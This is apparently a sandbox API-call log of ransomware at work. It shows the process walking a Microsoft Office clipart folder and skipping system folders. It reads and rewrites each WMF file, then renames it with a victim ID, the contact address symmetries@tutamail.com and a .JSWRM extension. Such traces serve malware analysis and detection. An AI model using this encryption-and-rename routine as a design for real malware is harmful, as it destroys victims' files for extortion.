[0089.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.029] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7aa6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0292270.WMF", cAlternateFileName="")) returned 1 [0089.029] lstrcmpiW (lpString1="J0292270.WMF", lpString2=".") returned 1 [0089.029] lstrcmpiW (lpString1="J0292270.WMF", lpString2="..") returned 1 [0089.029] lstrcmpiW (lpString1="J0292270.WMF", lpString2="...") returned 1 [0089.029] lstrcmpiW (lpString1="J0292270.WMF", lpString2="windows") returned -1 [0089.030] lstrcmpiW (lpString1="J0292270.WMF", lpString2="recovery") returned -1 [0089.030] lstrcmpiW (lpString1="J0292270.WMF", lpString2="perflogs") returned -1 [0089.030] lstrcmpiW (lpString1="J0292270.WMF", lpString2="documents and settings") returned 1 [0089.030] lstrcmpiW (lpString1="J0292270.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.030] lstrcmpiW (lpString1="J0292270.WMF", lpString2="system volume information") returned -1 [0089.030] lstrcmpiW (lpString1="J0292270.WMF", lpString2="msocache") returned -1 [0089.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292270.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292270.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292270.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292270.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292270.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292270.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.031] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31398) returned 1 [0089.031] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7aa0) returned 0x24d210 [0089.031] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7aa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7aa0, lpOverlapped=0x0) returned 1 [0089.035] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.035] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7aa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7aa0, lpOverlapped=0x0) returned 1 [0089.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.036] CloseHandle (hObject=0x314) returned 1 [0089.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0089.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0089.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0089.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0089.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0089.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.036] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0089.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.037] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b64, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0292272.WMF", cAlternateFileName="")) returned 1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2=".") returned 1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="..") returned 1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="...") returned 1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="windows") returned -1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="recovery") returned -1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="perflogs") returned -1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="documents and settings") returned 1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="system volume information") returned -1 [0089.037] lstrcmpiW (lpString1="J0292272.WMF", lpString2="msocache") returned -1 [0089.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292272.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292272.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292272.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292272.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292272.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292272.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0089.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.038] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7012) returned 1 [0089.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b60) returned 0x205850 [0089.038] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b60, lpOverlapped=0x0) returned 1 [0089.040] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.040] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b60, lpOverlapped=0x0) returned 1 [0089.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.040] CloseHandle (hObject=0x314) returned 1 [0089.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0089.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0089.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0089.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0089.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.041] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0089.045] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3658, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0292278.WMF", cAlternateFileName="")) returned 1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2=".") returned 1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="..") returned 1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="...") returned 1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="windows") returned -1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="recovery") returned -1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="perflogs") returned -1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="documents and settings") returned 1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="system volume information") returned -1 [0089.045] lstrcmpiW (lpString1="J0292278.WMF", lpString2="msocache") returned -1 [0089.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292278.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292278.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292278.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292278.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292278.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292278.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.046] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13912) returned 1 [0089.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3650) returned 0x24d210 [0089.046] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3650, lpOverlapped=0x0) returned 1 [0089.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.049] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3650, lpOverlapped=0x0) returned 1 [0089.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.049] CloseHandle (hObject=0x314) returned 1 [0089.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0089.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0089.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0089.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0089.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0089.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0089.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.051] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b56, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0292286.WMF", cAlternateFileName="")) returned 1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2=".") returned 1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="..") returned 1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="...") returned 1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="windows") returned -1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="recovery") returned -1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="perflogs") returned -1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="documents and settings") returned 1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="system volume information") returned -1 [0089.051] lstrcmpiW (lpString1="J0292286.WMF", lpString2="msocache") returned -1 [0089.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292286.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292286.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292286.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.051] 